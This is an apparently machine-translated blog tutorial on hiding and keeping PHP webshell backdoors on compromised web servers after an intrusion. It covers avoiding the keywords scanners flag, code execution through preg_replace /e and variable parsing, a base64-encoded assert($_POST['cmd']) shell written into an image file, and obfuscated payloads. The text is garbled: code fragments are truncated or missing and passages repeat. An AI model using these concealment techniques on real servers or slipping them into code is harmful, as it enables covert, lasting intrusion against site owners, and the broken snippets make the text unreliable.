After a successful test, you usually want to keep the privileges longer. The work of leaving backdoors is crucial. The backdoors usually deployed include but are not limited to database permissions, WEB permissions, system user permissions, etc. This article will popularize some of the ideas hidden in Volkswagen’s backdoors.
AD:
0×00 Preface
After a successful test, you usually want to keep the privileges longer. The work of leaving backdoors is very important. The backdoors usually deployed include but are not limited to databases. Permissions, WEB permissions, system user permissions, etc. This article will popularize some of the ideas hidden by popular backdoors.
Take PHP-WEBBACKDOOR as an example to attract others
A most common one-sentence backdoor may be written like this
or this
Of course, this is only different in the functions called. Regarding the functions disabled by PHP, please look for them in php.ini: disable_functions.
But there are many ways for operation and maintenance to intuitively find our shell. For example,
◆ found anomalies through file name/modification time/size, file backup comparison
◆ found through WEBSHELL backdoor scanning script, such as Scanbackdoor.php/Pecker/shelldetect.php and various scanners, etc.
◆Through Access.log access log found the location of the backdoor
◆Or, our test sentence will be blocked by WAF, and there will be a warning log, etc.
In view of common detection methods, the following seven common techniques are summarized to hide the shell
0×01 circumvention
Look at the various scanning backdoor codes and you will know that leaving a keyword that everyone knows and everyone shouts is absolutely not allowed in the shell
Common keywords such as :
◆System command execution: system, passthru, shell_exec, exec, popen, proc_open
◆Code execution: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13
◆File contains: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite
In the past, a friend cleverly used $_POST[0]($_POST[1]) to execute commands. Unfortunately, it is difficult to escape the scanner now, but everything has changed, and the construction method It is infinite
tudouya classmate gave [a construction technique] on FREEBUF (http://www.freebuf.com/articles/web/33824.html) using
Construction generation, of course, if it is too intuitive, you can write it like this
{} can parse the variable content within double quotes, @keep the error and continue execution
Then you can start to construct the hidden backdoor, but here the structure wants to rely on The command execution caused by the function is, yes, preg_replace
"//e",
$_POST[
'cmd'],"");?>
was executed and was not found. The way of execution is obvious. After regular matching The {${phpinfo()}} caused code execution when passed into funfunc
funfunc(
"{${phpinfo()}}")$_GET[
'cmd'].file contains everyone I have tried all the methods, but there are also techniques for including. Ordinary file inclusion may just be an include that contains a certain txt or jpg, or even directly leave an include vulnerability, but it is easy for a scanner to find it, and extra include files are also easy to find.
Look at this scriptif(@isset(
$_GET[content]))
'cGx1Z2luX20ucGhw'),w),
base64_decode('PD9waHAgQGFzc2VydCgkX1BPU1RbJ2NtZCddKTs/Pg=='));
'');?>
it can be seen that this image backdoor relies on the preg_replace e parameter, relies on PHP's variable parsing and execution, and uses base64 encoding. Finally, it relies on file identification to put together a complete shell, which can be regarded as hiding the backdoor for beginners. A little reminder for children's shoes
Of course, as long as there is an include point, the form of the included file is diverse, even including error_log (although you may want to consider closing it), only unexpected...
0×04 is hidden In order to prevent visitors After discovering the existence of backdoors, clever security researchers will also confuse things and try to confuse things"JGEpPjgiMpe yRrPSgidwcyc7ZWNobyAnPCcgiugiJGsuJz4nOgi2V2YWwoYgimFzZTY0X2giRlY2gi9kgiZShwcmVn";
stwrw_wrwepwlwawcwe");To summarize the above methods, most of them are nothing more than a process of constructing vulnerabilities. The code constructed by the vulnerability can be as weird as the backdoor can be. You can write something delicate and graceful, or you can make it simple and crude, but the applicable situations are different. For example It is not difficult to integrate ideas well and construct your own hidden shell. The above is just a summary of experience. If you have interesting ideas, please feel free to enlighten me.
The above introduces the PHP backdoor hiding and maintenance techniques, including the relevant content. I hope it will be helpful to friends who are interested in PHP tutorials.